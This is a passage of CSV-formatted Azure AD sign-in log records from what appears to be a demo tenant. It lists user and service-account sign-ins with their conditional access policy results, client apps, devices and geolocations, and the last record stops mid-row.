+860,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b30c317-e6f8-4cfe-9342-205c2e1b1d36,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c27bb27f-6b5f-4aa7-85e4-b0d8e4f60800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c27bb27f-6b5f-4aa7-85e4-b0d8e4f60800,SigninLogs,Sucess,36.6404686,-78.26995087
+861,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9fddf9a9-3fc0-40d2-ad77-fb16bfccc608,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",13ab9514-e229-4755-99bf-dc8874b60c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,13ab9514-e229-4755-99bf-dc8874b60c00,SigninLogs,Sucess,50.6406517,5.572050095
+862,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:06.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4885b5c5-efc2-4dce-9d3d-5253f53e95f5,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",dfda3bbc-b55b-4a89-a1fb-2fc045b50a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,dfda3bbc-b55b-4a89-a1fb-2fc045b50a00,SigninLogs,Sucess,50.6406517,5.572050095
+863,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,caf8685e-ab09-48a7-bb19-78e07e478466,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d42231e90900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d42231e90900,SigninLogs,Sucess,36.6404686,-78.26995087
+864,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2d4f15fa-a870-4294-820b-9fab75f2b75a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e4ad56a4-20cd-4ec9-8d5b-ecb8e05c0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e4ad56a4-20cd-4ec9-8d5b-ecb8e05c0900,SigninLogs,Sucess,36.6404686,-78.26995087
+865,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,caf8685e-ab09-48a7-bb19-78e07e478466,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d42231e90900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d42231e90900,SigninLogs,Sucess,36.6404686,-78.26995087
+866,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:29.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,88c1469f-c04f-0000-5d4f-bf678084fbc6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4dedf5e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f81997e3-0b26-42cc-8532-c4dedf5e0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+867,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f9ecdb88-7160-4501-905d-4a4ca9eeffa0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4130ca1d-0d16-4aad-a433-4063d5830a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 